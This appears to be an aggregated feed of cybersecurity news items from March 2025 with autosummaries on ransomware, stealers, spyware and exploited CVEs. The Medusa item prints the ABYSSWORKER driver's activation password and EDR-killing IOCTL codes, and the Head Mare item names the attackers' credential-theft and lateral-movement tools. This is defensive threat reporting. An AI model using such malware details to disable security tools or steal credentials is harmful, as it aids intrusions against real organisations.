    Autosummary: Moving beyond checkbox security for true resilience In this Help Net Security interview, William Booth, director, ATT&CK Evaluations at MITRE, discusses how CISOs can integrate regulatory compliance with proactive risk management, prioritize spending based on threat-informed assessments, and address overlooked vulnerabilities like shadow IT and software supply chain risks.


    FBI warnings are true—fake file converters do push malware

    exploits
    2025-03-23 https://www.bleepingcomputer.com/news/security/fbi-warnings-are-true-fake-file-converters-do-push-malware/
    The FBI is warning that fake online document converters are being used to steal people's information and, in worst-case scenarios, lead to ransomware attacks. [...]

    Autosummary: The FBI also says that the uploaded documents can also be scraped for sensitive information, such as names, social security numbers, cryptocurrency seeds, passphrases, wallet addresses, email addresses, passwords, and banking information. This JavaScript file is Gootloader, a malware loader known for downloading additional malware, such as banking trojans, infostealers, malware downloaders, and post-exploitation tools, like Cobalt Strike beacons.


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 38

    exploits
    2025-03-23 https://securityaffairs.com/175746/malware/security-affairs-malware-newsletter-round-38.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Decrypting Encrypted files from Akira Ransomware (Linux/ESXI variant 2024) using a bunch of GPUs; Jaguar Land Rover Breached by HELLCAT Ransomware Group Using Its Infostealer Playbook—Then a Second Hacker Strikes; ClearFake’s New Widespread Variant: Increased Web3 […]


    Zero-day broker Operation Zero offers up to $4 million for Telegram exploits

    exploits
    2025-03-22 https://securityaffairs.com/175709/hacking/operation-zero-offers-4m-for-telegram-exploits.html
    Russian zero-day broker Operation Zero is looking for exploits for the popular messaging app Telegram, offering up to $4 million for them. Operation Zero, a Russian zero-day broker, is offering up to $4 million for Telegram exploits, the news was first reported by Tech Crunch. The Russian firm seeks up to $500K for one-click RCE, […]

    Autosummary: The prices depend on limitations of zero-days and obtained privileges.… — Operation Zero (@opzero_en) March 20, 2025 A zero-day broker like Operation Zero might be willing to pay millions for Telegram exploits for several reasons, including: Government and Intelligence Demand – Telegram is widely used for secure communication, including by journalists, activists, dissidents, and political figures.


    U.S. Treasury Lifts Tornado Cash Sanctions Amid North Korea Money Laundering Probe

    financial
    2025-03-22 https://thehackernews.com/2025/03/us-treasury-lifts-tornado-cash.html
    The U.S. Treasury Department has announced that it's removing sanctions against Tornado Cash, a cryptocurrency mixer service that has been accused of aiding the North Korea-linked Lazarus Group to launder their ill-gotten proceeds. "Based on the Administration's review of the novel legal and policy issues raised by use of financial sanctions against financial and commercial activity occurring


    Microsoft Trusted Signing service abused to code-sign malware

    exploits
    2025-03-22 https://www.bleepingcomputer.com/news/security/microsoft-trust-signing-service-abused-to-code-sign-malware/
    Cybercriminals are abusing Microsoft's Trusted Signing platform to code-sign malware executables with short-lived three-day certificates. [...]

    Autosummary: Abusing Microsoft Trusted Signing service Recently, cybersecurity researchers have seen threat actors utilizing the Microsoft Trusted Signing service to sign their malware with short-lived, three-day code-signing certificates. "In this regard, the verification process for Microsoft's certificates is substantially easier than the verification process for EV certificates: due to the ambiguity over EV certificates, it makes sense to use the Microsoft certificates."


    AI will make ransomware even more dangerous

    exploits ransomware
    2025-03-21 https://www.helpnetsecurity.com/2025/03/21/exposure-management-understanding-among-security-leaders/

    Ransomware is the top predicted threat for 2025, which is especially concerning given 38% of security professionals say ransomware will become even more dangerous when powered by AI, according to Ivanti. In comparison to the threat level, only 29% of security professionals say they are very prepared for ransomware attacks – leaving a significant gap in preparedness (29%), highlighting the need for more robust security measures. Strong understanding of exposure management among security leaders A … More

    Autosummary: “However, for exposure management to be successful, organizations should ensure collaboration between security and other departments, conduct risk assessments that align with the organization’s risk appetite, and prioritize mitigation of the most impactful vulnerabilities.”


    Scammers cash in on tax season

    financial
    2025-03-21 https://www.helpnetsecurity.com/2025/03/21/tax-season-scams/

    AI-powered phishing emails, deepfake phone calls, and fake tax prep websites are making tax scams more convincing and costly than ever, according to McAfee. Cybercriminals are pulling out all the stops to trick Americans out of their hard-earned money, and it’s working: nearly one in four Americans say they or someone they know has lost money to a tax scam. Fraudsters are becoming more sophisticated More than half of Americans say fraud is more sophisticated … More

    Autosummary: Here’s what they’re asking for most: Social security number or tax identification number (40%); Back taxes payment demand (27%); Birth date (26%); Home address (25%); Phone number (22%); Email address (21%); Bank account numbers (18%); Credit/debit card information (17%); Fake tax refund offer (15%). To protect yourself, ignore unexpected messages claiming to be from the IRS—official tax communications come by mail, not through texts, emails, or phone calls.


    Ongoing Cyber Attacks Exploit Critical Vulnerabilities in Cisco Smart Licensing Utility

    exploits
    2025-03-21 https://thehackernews.com/2025/03/ongoing-cyber-attacks-exploit-critical.html
    Two now-patched security flaws impacting Cisco Smart Licensing Utility are seeing active exploitation attempts, according to SANS Internet Storm Center. The two critical-rated vulnerabilities in question are listed below - CVE-2024-20439 (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account that an attacker could exploit to log in to an


    Cisco Smart Licensing Utility flaws actively exploited in the wild

    exploits
    2025-03-21 https://securityaffairs.com/175692/security/cisco-smart-licensing-utility-flaws-actively-exploited-in-the-wild.html
    Experts warn of the active exploitation of two recently patched security vulnerabilities affecting Cisco Smart Licensing Utility. Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, a static credential backdoor, and CVE-2024-20440, an information disclosure flaw. Attackers can exploit the backdoor to access sensitive log files. While no active exploitation was initially observed, the […]

    Autosummary: Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, a static credential backdoor, and CVE-2024-20440, an information disclosure flaw.


    Steam pulls game demo infecting Windows with info-stealing malware

    exploits
    2025-03-21 https://www.bleepingcomputer.com/news/security/steam-pulls-game-demo-infecting-windows-with-info-stealing-malware/
    Valve has removed a game titled "Sniper: Phantom's Resolution" from the Steam store following multiple user reports that indicated its demo installer actually infected their systems with information stealing malware. [...]

    Autosummary: The suspicious title on Steam Source: Internet Archive Analyzing the installer file, Reddit users noticed that it was named "Windows Defender SmartScreen.exe" and discovered commodity attack tools such as a privilege escalation utility, a Node.js wrapper, and the tool "Fiddler," which could intercept cookies.


    NAKIVO Backup & Replication vulnerability exploited by attackers (CVE-2024-48248)

    exploits
    2025-03-21 https://www.helpnetsecurity.com/2025/03/21/nakivo-backup-replication-vulnerability-exploited-by-attackers-cve-2024-48248/

    A vulnerability (CVE-2024-48248) in NAKIVO Backup and Replication, a backup, ransomware protection and disaster recovery solution designed for organizations of all sizes and managed service providers (MSPs), is being actively exploited. The US Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog on Wednesday, but it’s yet unknown whether the flaw is being leveraged by ransomware attackers, who often try to delete existing backups to make it more … More



    Medusa Ransomware Uses Malicious Driver to Disable Anti-Malware with Stolen Certificates

    exploits ransomware
    2025-03-21 https://thehackernews.com/2025/03/medusa-ransomware-uses-malicious-driver.html
    The threat actors behind the Medusa ransomware-as-a-service (RaaS) operation have been observed using a malicious driver dubbed ABYSSWORKER as part of a bring your own vulnerable driver (BYOVD) attack designed to disable anti-malware tools. Elastic Security Labs said it observed a Medusa ransomware attack that delivered the encryptor by means of a loader packed using a packer-as-a-service (PaaS

    Autosummary: The list of some of the I/O control codes is below - 0x222080 - Enable the driver by sending a password "7N6bCAoECbItsUR5-h4Rp2nkQxybfKb0F-wgbJGHGh20pWUuN1-ZxfXdiOYps6HTp0X"; 0x2220c0 - Load necessary kernel APIs; 0x222184 - Copy file; 0x222180 - Delete file; 0x222408 - Kill system threads by module name; 0x222400 - Remove notification callbacks by module name; 0x2220c0 - Load API; 0x222144 - Terminate process by their process ID; 0x222140 - Terminate thread by their thread ID; 0x222084 - Disable malware; 0x222664 - Reboot the machine. Of particular interest is 0x222400, which can be used to blind security products by searching and removing all registered notification callbacks, an approach also adopted by other EDR-killing tools like EDRSandBlast and RealBlindingEDR.


    China-Linked APT Aquatic Panda: 10-Month Campaign, 7 Global Targets, 5 Malware Families

    exploits
    2025-03-21 https://thehackernews.com/2025/03/china-linked-apt-aquatic-panda-10-month.html
    The China-linked advanced persistent threat (APT) group known as Aquatic Panda has been linked to a "global espionage campaign" that took place in 2022 targeting seven organizations. These entities include governments, Catholic charities, non-governmental organizations (NGOs), and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States. The activity, which took place "

    Autosummary: "


    Kaspersky Links Head Mare to Twelve, Targeting Russian Entities via Shared C2 Servers

    rusia-ucrania
    2025-03-21 https://thehackernews.com/2025/03/kaspersky-links-head-mare-to-twelve.html
    Two known threat activity clusters codenamed Head Mare and Twelve have likely joined forces to target Russian entities, new findings from Kaspersky reveal. "Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents," the company said. "This suggests "

    Autosummary: Some of the other utilities used are:
    - quser.exe, tasklist.exe, and netstat.exe for system reconnaissance
    - fscan and SoftPerfect Network Scanner for local network reconnaissance
    - ADRecon for gathering information from Active Directory
    - Mimikatz, secretsdump, and ProcDump for credential harvesting
    - RDP for lateral movement
    - mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication
    - Rclone for data transfer
    The attacks culminate with the deployment of LockBit 3.0 and Babuk ransomware on compromised hosts, followed by dropping a note that urges victims to contact them on Telegram for decrypting their files. "


    Microsoft: Exchange Online bug mistakenly quarantines user emails

    exploits
    2025-03-21 https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-online-bug-mistakenly-quarantines-user-emails/
    Microsoft is investigating an Exchange Online bug causing anti-spam systems to mistakenly quarantine some users' emails. [...] "

    Autosummary: "


    53% of security teams lack continuous and up-to-date visibility

    ransomware
    2025-03-21 https://www.helpnetsecurity.com/2025/03/21/enterprises-data-visibility-security-risks/

    Enterprises lack visibility into their own data, creating security risks that are compounding as organizations and their employees increase AI adoption, according to Bedrock Security. The majority of organizations struggle to track sensitive information across sprawling cloud environments, leaving them vulnerable to data breaches and compliance failures. The research also documents a significant shift in security roles, with nine in 10 professionals surveyed reporting their responsibilities have evolved in the past year, most notably in … More

    The post 53% of security teams lack continuous and up-to-date visibility appeared first on Help Net Security.

    "

    Autosummary: Looking ahead, organizations:
    - will focus on AI/ML data usage governance (70%)
    - aim to strengthen policy enforcement across cloud environments (64%)
    - want more accurate data classification (58%)
    - plan to improve security tools with better data awareness (53%)
    - will increase infrastructure security focus (68%)
    “These priorities show a clear shift toward data-centric security,” said Kurtic. Broken out by role:
    - CISOs/CSOs/CTOs: Almost 70% of these respondents have taken on new data discovery responsibilities, specifically for AI initiatives
    - Security managers/directors: 55% of these respondents added data governance duties for AI training
    - Security engineers/architects: 52% of these respondents have new AI data discovery responsibilities
    Most organizations can’t track what data feeds their AI systems
    48% of organizations express high confidence in controlling sensitive data used for AI/ML training. "


    WhatsApp fixed zero-day flaw used to deploy Paragon Graphite spyware

    exploits
    2025-03-20 https://securityaffairs.com/175629/security/whatsapp-fixed-zero-day-flaw-used-to-deploy-paragon-graphite-spyware-spyware.html
    WhatsApp fixed a zero-click, zero-day vulnerability used to install Paragon’s Graphite spyware on the devices of targeted individuals. WhatsApp has addressed a zero-click, zero-day vulnerability exploited to install Paragon’s Graphite spyware on the devices of targeted individuals. WhatsApp blocked a spyware campaign by Paragon targeting journalists and civil society members after reports of the Citizen […] "

    Autosummary: “The infrastructure we found is linked to webpages entitled “Paragon” returned by IP addresses in Israel (where Paragon is based), as well as a TLS certificate containing the organization name “Graphite”, which is the name of Paragon’s spyware, and the common name “installerserver” (Pegasus, a competitor spyware product, uses the term “Installation Server” to refer to a server designed to infect a device with spyware).” "


    Whistleblower reveals oil giant's "awful" pollution

    industry
    2025-03-20 https://www.bbc.com/news/articles/crewlj11jljo
    Colombia’s Ecopetrol polluted hundreds of sites, including water sources and wetlands, the BBC finds. "

    Autosummary: The BBC saw a black, oily-looking substance and containment barriers at one of the sites listed in the database as "only known to Ecopetrol". Ecopetrol's CEO from 2017 to 2023, Felipe Bayón, told the BBC he strongly denied suggestions that there was any policy to withhold information about pollution. Pointing to it, Yuly Velásquez, president of Fedepesan, a federation of fishing organisations in the region, said: "This is all grease and waste that comes directly from the Ecopetrol refinery." "We found turtles, capybaras, birds, thousands of dead fish," she said last June. Mr Olarte says he realised "something was wrong" soon after joining Ecopetrol. Andrés Olarte, the whistleblower who has shared the company's data, says pollution by the firm dates back many years. "There is always that risk of some sort of contagion between the private security companies, the types of people they employ, and their desire to continually maintain their contract," Mr Smith says. "


    Kali Linux 2025.1a drops with theme refresh, Kali NetHunter updates

    Linux
    2025-03-20 https://www.helpnetsecurity.com/2025/03/20/kali-linux-2025-1a-released/

    Kali Linux 2025.1a is now available. This release enhances existing features with improvements designed to streamline your experience. 2025 theme refresh Kali Linux 2025.1a introduces an annual theme refresh, maintaining a modern interface. This year’s update debuts a redesigned theme aimed at enhancing the user experience from startup. Users can expect notable visual updates, including an improved boot menu, a refined login screen, and a selection of new desktop wallpapers for both Kali and Kali … More

    The post Kali Linux 2025.1a drops with theme refresh, Kali NetHunter updates appeared first on Help Net Security.

    "

    Autosummary: Samsung Galaxy S9 (Exynos9810 – LineageOS 20/Android 13), Samsung Galaxy S10 (Exynos9820 – LineageOS 21 & LineageOS 22.1), Xiaomi Redmi Note 6 Pro (Android 11). Download: Kali Linux 2025.1a is now available to download or upgrade if you’re already running Kali Linux. "


    Why Continuous Compliance Monitoring Is Essential For IT Managed Service Providers

    ransomware Telcos
    2025-03-20 https://thehackernews.com/2025/03/why-continuous-compliance-monitoring-is.html
    Regulatory compliance is no longer just a concern for large enterprises. Small and mid-sized businesses (SMBs) are increasingly subject to strict data protection and security regulations, such as HIPAA, PCI-DSS, CMMC, GDPR, and the FTC Safeguards Rule. However, many SMBs struggle to maintain compliance due to limited IT resources, evolving regulatory requirements, and complex security challenges "

    Autosummary: By offering proactive compliance monitoring with Compliance Manager GRC, you can:
    ✅ Help clients avoid fines and security risks
    ✅ Automate compliance reporting and streamline audits
    ✅ Expand their service offerings and increase revenue
    ✅ Build long-term relationships with businesses in need of compliance expertise
    With compliance regulations only getting stricter, MSPs that invest in continuous compliance solutions today will be well-positioned for long-term success. New Features That Make Compliance Manager GRC Even More Powerful: Compliance Monitor (continuous compliance monitoring) enables automated, ongoing compliance monitoring, ensuring MSPs and their clients stay compliant with minimal manual effort. How MSPs Can Implement Continuous Compliance Monitoring: To successfully offer compliance monitoring, you should leverage automated compliance tools – use platforms like Compliance Manager GRC that provide real-time compliance assessments and reporting. "Together, Compliance Monitor and Risk Manager make Compliance Manager GRC a no-brainer for MSPs looking to save time, reduce risk, and turn compliance into a high-value service." — Javier Dugarte, VP of Sales and Operations, GoCloud Inc. With Compliance Manager GRC, MSPs can turn compliance into a competitive advantage, securing high-value clients and unlocking new revenue streams. "


    CISA Adds NAKIVO Vulnerability to KEV Catalog Amid Active Exploitation

    exploits
    2025-03-20 https://thehackernews.com/2025/03/cisa-adds-nakivo-vulnerability-to-kev.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity security flaw impacting NAKIVO Backup & Replication software to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability in question is CVE-2024-48248 (CVSS score: 8.6), an absolute path traversal bug that could allow an unauthenticated attacker to "

    Autosummary: "


    CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT

    industry
    2025-03-20 https://securityaffairs.com/175642/hacking/cert-ua-warns-ukrainian-defense-industry-dark-crystal-rat.html
    CERT-UA warns of a cyber campaign using Dark Crystal RAT to target Ukraine’s defense sector, including defense industry employees and Defense Forces members. The Computer Emergency Response Team of Ukraine (CERT-UA) uncovered a new cyber espionage campaign targeting employees of defense-industrial complex enterprises and representatives of the Defense Forces of Ukraine with Dark Crystal RAT. […] "

    Autosummary: The DCRat consists of three components: a stealer/client executable; a single PHP page, serving as the command-and-control (C2) endpoint/interface; and an administrator tool. In June 2022, the Governmental Computer Emergency Response Team of Ukraine (CERT-UA) warned of another malware campaign targeting Ukrainian telecommunications operators with the DarkCrystal RAT. "


    Is it time to retire "one-off" pen tests for continuous testing?

    ransomware
    2025-03-20 https://www.bleepingcomputer.com/news/security/is-it-time-to-retire-one-off-pen-tests-for-continuous-testing/
    Annual pentests can leave security gaps that attackers can exploit for months. Learn more from Outpost24 about why continuous penetration testing (PTaaS) offers real-time detection, remediation, and stronger protection. [...] "

    Autosummary: But while that may be valuable for compliance purposes, these kinds of point-in-time assessments simply don’t align with modern development practices and cybersecurity requirements:
    - With each code iteration, security snapshots lose relevance
    - Patch verification stalls until the next scheduled assessment window
    - Development teams get large batches of findings rather than actionable, real-time feedback
    - Limited tester and retesting availability creates bottlenecks in security testing
    - Communication barriers between developers and testers slow down remediation to a crawl
    Continuous testing for modern development: Penetration Testing as a Service (PTaaS) offers a more flexible approach that better aligns with rapid development cycles.
    - Real-time vulnerability reporting lets you take immediate action on critical issues
    - Developers and testers can directly communicate, speeding up remediation
    - Unlimited retesting lets you verify fixes without waiting for the next assessment cycle
    - Having access to diverse tester expertise ensures comprehensive security coverage and could even eliminate the need for vendor rotation
    - A hybrid approach combines the best of both automated scanning and manual testing expertise to cover all possible vulnerability sources
    Beyond just finding vulnerabilities: Finding vulnerabilities is only half the battle — rapid remediation requires that security teams partner closely with developers. "


    Critical Veeam Backup & Replication RCE vulnerability fixed, patch ASAP! (CVE-2025-23120)

    exploits
    2025-03-20 https://www.helpnetsecurity.com/2025/03/20/critical-veeam-backup-replication-rce-vulnerability-cve-2025-23120/

    Veeam has released fixes for a critical remote code execution vulnerability (CVE-2025-23120) affecting its enterprise Veeam Backup & Replication solution, and is urging customers to quickly upgrade to a fixed version. There is currently no indication that the vulnerability is being leveraged by attackers. It was privately reported by researcher Piotr Bazydlo of watchTowr Labs, who followed the release of the patch with a technical write-up and pointers on how a proof-of-concept exploit for a … More

    The post Critical Veeam Backup & Replication RCE vulnerability fixed, patch ASAP! (CVE-2025-23120) appeared first on Help Net Security.

    "

    Autosummary: "


    Six Governments Likely Use Israeli Paragon Spyware to Hack IM Apps and Harvest Data

    government
    2025-03-20 https://thehackernews.com/2025/03/six-governments-likely-use-israeli.html
    The governments of Australia, Canada, Cyprus, Denmark, Israel, and Singapore are likely customers of spyware developed by Israeli company Paragon Solutions, according to a new report from The Citizen Lab. Paragon, founded in 2019 by Ehud Barak and Ehud Schneorson, is the maker of a surveillance tool called Graphite that's capable of harvesting sensitive data from instant messaging applications "

    Autosummary: Targets of these attacks included individuals spread across over two dozen countries, including several in Europe such as Belgium, Greece, Latvia, Lithuania, Austria, Cyprus, Czech Republic, Denmark, Germany, the Netherlands, Portugal, Spain, and Sweden. "


    U.S. CISA adds Edimax IC-7100 IP Camera, NAKIVO, and SAP NetWeaver AS Java flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-03-20 https://securityaffairs.com/175663/security/u-s-cisa-adds-edimax-ic-7100-ip-camera-nakivo-and-sap-netweaver-as-java-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Edimax IC-7100 IP Camera, NAKIVO, and SAP NetWeaver AS Java flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: In early March, 2025, US CISA warned that multiple botnets are exploiting a […] "

    Autosummary: In early March, 2025, US CISA warned that multiple botnets are exploiting a recently disclosed vulnerability, tracked as CVE-2025-1316 (CVSS score of 9.8), in Edimax IC-7100 IP cameras. "


    RansomHub ransomware uses new Betruger ‘multi-function’ backdoor

    exploits ransomware
    2025-03-20 https://www.bleepingcomputer.com/news/security/ransomhub-ransomware-uses-new-betruger-multi-function-backdoor/
    Security researchers have linked a new backdoor dubbed Betruger, deployed in several recent ransomware attacks, to an affiliate of the RansomHub operation. [...] "

    Autosummary: Since it surfaced, the ransomware gang has claimed multiple high-profile victims, including oil services giant Halliburton, the Christie's auction house, US telecom provider Frontier Communications, the Rite Aid drugstore chain, Kawasaki's EU division, the Planned Parenthood sexual health nonprofit, and the Bologna Football Club. "


    WordPress security plugin WP Ghost vulnerable to remote code execution bug

    exploits
    2025-03-20 https://www.bleepingcomputer.com/news/security/wordpress-security-plugin-wp-ghost-vulnerable-to-remote-code-execution-bug/
    Popular WordPress security plugin WP Ghost is vulnerable to a critical severity flaw that could allow unauthenticated attackers to remotely execute code and hijack servers. [...] "

    Autosummary: It also offers protection against SQL injection, script injection, vulnerability exploitation, malware dropping, file inclusion exploits, directory traversal attacks, and cross-site scripting. "


    Semrush impersonation scam hits Google Ads

    financial
    2025-03-20 https://www.malwarebytes.com/blog/cybercrime/2025/03/semrush-impersonation-scam-hits-google-ads
    The phishing campaign for valuable Google accounts continues with a new twist, going after the customers of a SaaS platform. "

    Autosummary: As part of our investigations, we uncovered a new operation going after Semrush, a visibility management SaaS platform that offers SEO, advertising, and market research, amongst other things. In GSC, the bad actors could see historical data for the past 16 months, including but not limited to search queries, pages, countries, devices, search appearance and dates. "


    Cybersecurity jobs available right now in the USA: March 20, 2025

    ciber
    2025-03-20 https://www.helpnetsecurity.com/2025/03/20/cybersecurity-jobs-available-right-now-in-the-usa-march-20-2025/

    AI Security Architect Verizon | USA | Hybrid – View job details As an AI Security Architect, you will ensure security architecture reviews are integrated into Verizon’s AI development lifecycle. This includes embedding robust security measures from design to deployment, conducting risk assessments on AI models, and implementing security tools and protocols in AI/ML operations. Application Penetration Tester – Cyber Security Supervisor RSM US LLP | USA | Hybrid – View job details As an … More

    The post Cybersecurity jobs available right now in the USA: March 20, 2025 appeared first on Help Net Security.

    "

    Autosummary: Senior Application Security Engineer CLEAR | USA | On-site – View job details As a Senior Application Security Engineer, you will perform security risk assessments, manual penetration security testing, automate security testing, threat modeling, and develop/conduct education on secure coding. CISO Equinix | USA | Hybrid – View job details As a CISO, you will develop and execute a comprehensive information security strategy that is aligned with business objectives, risk appetite, goals, regulatory requirements, and industry best practices. Network Security Engineer (DevSecOps) Intel | USA | Hybrid – View job details As a Network Security Engineer (DevSecOps), you will assist in architecting network security products, including testing, validation, and selection. You will tune and enhance system infrastructure for security, automate manual tasks through scripting and application development, investigate and adopt new security technologies and tools as needed, and evaluate, test, and integrate new security controls, settings, and tools. "


    YouTube Game Cheats Spread Arcane Stealer Malware to Russian-Speaking Users

    exploits rusia-ucrania
    2025-03-20 https://thehackernews.com/2025/03/youtube-game-cheats-spread-arcane.html
    YouTube videos promoting game cheats are being used to deliver a previously undocumented stealer malware called Arcane likely targeting Russian-speaking users. "What's intriguing about this malware is how much it collects," Kaspersky said in an analysis. "It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla, and "

    Autosummary: Besides stealing login credentials, passwords, credit card data, and cookies from various Chromium- and Gecko-based browsers, Arcane is equipped to harvest comprehensive system data as well as configuration files, settings, and account information from several apps, as follows:
    - VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, and ExpressVPN
    - Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, and DynDNS
    - Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, and Viber
    - Email clients: Microsoft Outlook
    - Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, and various Minecraft clients
    - Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, and Coinomi
    Furthermore, Arcane is designed to take screenshots of the infected device, enumerate running processes, and list saved Wi-Fi networks and their passwords. "


    CISA tags NAKIVO backup flaw as actively exploited in attacks

    exploits
    2025-03-20 https://www.bleepingcomputer.com/news/security/cisa-tags-nakivo-backup-flaw-as-actively-exploited-in-attacks/
    CISA has warned U.S. federal agencies to secure their networks against attacks exploiting a high-severity vulnerability in NAKIVO's Backup & Replication software. [...] "

    Autosummary: "


    VSCode extensions found downloading early-stage ransomware

    exploits ransomware
    2025-03-20 https://www.bleepingcomputer.com/news/security/vscode-extensions-found-downloading-early-stage-ransomware/
    Two malicious VSCode Marketplace extensions were found deploying in-development ransomware from a remote server, exposing critical gaps in Microsoft's review process. [...] "

    Autosummary: The extensions, named "ahban.shiba" and "ahban.cychelloworld," were downloaded seven and eight times, respectively, before they were eventually removed from the store. "


    Critical Cisco Smart Licensing Utility flaws now exploited in attacks

    exploits
    2025-03-20 https://www.bleepingcomputer.com/news/security/critical-cisco-smart-licensing-utility-flaws-now-exploited-in-attacks/
    Attackers have started targeting Cisco Smart Licensing Utility (CSLU) instances unpatched against a vulnerability exposing a built-in backdoor admin account. [...] "

    Autosummary: "


    BlackLock ransomware: What you need to know

    exploits ransomware
    2025-03-20 https://www.tripwire.com/state-of-security/blacklock-ransomware-what-you-need-know
    BlackLock has become a big deal, very quickly. It has been predicted to be one of the biggest ransomware-as-a-service operations of 2025. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: In addition, BlackLock has been actively attracting new affiliates on RAMP, a Russian-language ransomware-focused cybercrime forum, as well as recruiting developers, initial access brokers and traffers (people who direct victims to malicious content). BlackLock follows a RaaS (ransomware-as-a-service) business model, leasing its tools and infrastructure to affiliates who launch attacks, sharing a proportion of the proceeds with BlackLock. "


    Veeam RCE bug lets domain users hack backup servers, patch now

    exploits
    2025-03-20 https://www.bleepingcomputer.com/news/security/veeam-rce-bug-lets-domain-users-hack-backup-servers-patch-now/
    Veeam has patched a critical remote code execution vulnerability tracked as CVE-2025-23120 in its Backup & Replication software that impacts domain-joined installations. [...] "

    Autosummary: A deserialization flaw is when an application improperly processes serialized data, allowing attackers to inject malicious objects, or gadgets, that can execute harmful code. "


    Pennsylvania State Education Association data breach impacts 500,000 individuals

    financial government
    2025-03-20 https://securityaffairs.com/175681/data-breach/pennsylvania-state-education-association-data-breach.html
    A data breach at the Pennsylvania State Education Association exposed the personal information of over 500,000 individuals. The Pennsylvania State Education Association (PSEA) suffered a data breach that impacted 517,487 individuals. PSEA is a labor union representing teachers, education support professionals, and other school employees in Pennsylvania. It advocates for public education, negotiates contracts, and […] "

    Autosummary: Compromised personal information includes full names in combination with one or more of the following elements: Date of Birth, Driver’s License or State ID, Social Security Number, Account Number, Account PIN, Security Code, Password and Routing Number, Payment Card Number, Payment Card PIN and Payment Card Expiration Date, Passport Number, Taxpayer ID Number, Username and Password, Health Insurance Information and Medical Information. "


    CISA Warns of Active Exploitation in GitHub Action Supply Chain Compromise

    exploits
    2025-03-19 https://thehackernews.com/2025/03/cisa-warns-of-active-exploitation-in.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a vulnerability linked to the supply chain compromise of the GitHub Action, tj-actions/changed-files, to its Known Exploited Vulnerabilities (KEV) catalog. The high-severity flaw, tracked as CVE-2025-30066 (CVSS score: 8.6), involves the breach of the GitHub Action to inject malicious code that enables a remote "

    Autosummary: "tj-actions/eslint-changed-files uses reviewdog/action-setup@v1, and the tj-actions/changed-files repository runs this tj-actions/eslint-changed-files Action with a Personal Access Token," Wiz researcher Rami McCarthy said. "


    Outseer introduces Behavioral Biometrics capability

    industry
    2025-03-19 https://www.helpnetsecurity.com/2025/03/19/outseer-behavioral-biometrics-capability/

    Outseer announced its platform-native Behavioral Biometrics capability. The addition of platformized Behavioral Biometrics introduces another layer of defense that continuously analyzes user interactions to detect anomalies in real time. Building on its rich RSA heritage (formerly RSA Fraud & Risk Intelligence), Outseer has enhanced its platform to counter modern cyber threats. As fraud evolves, spurred by the digitization of payments, the spread of personal data across the dark web, the growing threat of scams and … More

    The post Outseer introduces Behavioral Biometrics capability appeared first on Help Net Security.

    "

    Autosummary: "


    Critical mySCADA myPRO Flaws Could Let Attackers Take Over Industrial Control Systems

    industry
    2025-03-19 https://thehackernews.com/2025/03/critical-myscada-mypro-flaws-could-let.html
    Cybersecurity researchers have disclosed details of two critical flaws impacting mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system used in operational technology (OT) environments, that could allow malicious actors to take control of susceptible systems. "These vulnerabilities, if exploited, could grant unauthorized access to industrial control networks, potentially "

    Autosummary: "


    U.S. CISA adds Fortinet FortiOS/FortiProxy and GitHub Action flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-03-19 https://securityaffairs.com/175583/security/u-s-cisa-adds-fortinet-fortios-fortiproxy-and-github-action-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Fortinet FortiOS/FortiProxy and GitHub Action flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: In February, Fortinet warned that threat actors were exploiting a new zero-day vulnerability, tracked as CVE-2025-24472 (CVSS score of 8.1), in […] "

    Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:
    - CVE-2025-24472 Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
    - CVE-2025-30066 tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability
    In February, Fortinet warned that threat actors were exploiting a new zero-day vulnerability, tracked as CVE-2025-24472 (CVSS score of 8.1), in FortiOS and FortiProxy to hijack Fortinet firewalls. The tj-actions/changed-files GitHub Action is used in over 23,000 repositories; it automates workflows by detecting file changes in commits or pull requests, aiding testing and automation. Although Mora_001 is tracked as an independent threat actor, it exhibits consistent post-exploitation tactics, including identical usernames across victims, overlapping IPs, and rapid ransomware deployment within 48 hours. "


    Why it"s time for phishing prevention to move beyond email

    financial
    2025-03-19 https://www.bleepingcomputer.com/news/security/why-its-time-for-phishing-prevention-to-move-beyond-email/
